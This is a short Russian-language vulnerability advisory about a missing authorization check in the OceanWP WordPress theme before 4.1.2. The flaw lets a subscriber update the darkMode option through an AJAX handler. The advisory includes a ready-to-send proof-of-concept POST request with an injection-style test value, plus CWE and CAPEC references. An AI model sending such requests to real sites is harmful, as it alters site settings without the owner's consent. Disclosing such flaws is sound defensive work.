Тема OceanWP WordPress до версии 4.1.2 уязвима к обновлению опций из-за отсутствия проверки прав доступа в одном из обработчиков AJAX-запро…
Тема OceanWP WordPress до версии 4.1.2 уязвима к обновлению опций из-за отсутствия проверки прав доступа в одном из обработчиков AJAX-запросов, что позволяет любому авторизованному пользователю, например, подписчику, обновить настройку darkMode. Для эксплуатации уязвимости необходимо войти в систему под пользователем с ролью подписчика и отправить POST-запрос [1]: ``` POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in=... action=ocean_update_search_box_light_mode&darkMode=HamitCIBO-ClientSideİnjection-Salut! ``` Уязвимость исправлена в версии 4.1.2. Источники: - [1] https://wpscan.com/vulnerability/cf77b7f2-525b-4fe8-b612-185a1c18c197/
Продукт не выполняет проверку авторизации при попытке субъекта получить доступ к ресурсу или выполнить действие.
https://cwe.mitre.org/data/definitions/862.html →Открыть в коллекции CWE →Нет описания в исходных данных.
https://capec.mitre.org/data/definitions/665.html →Открыть в коллекции CAPEC →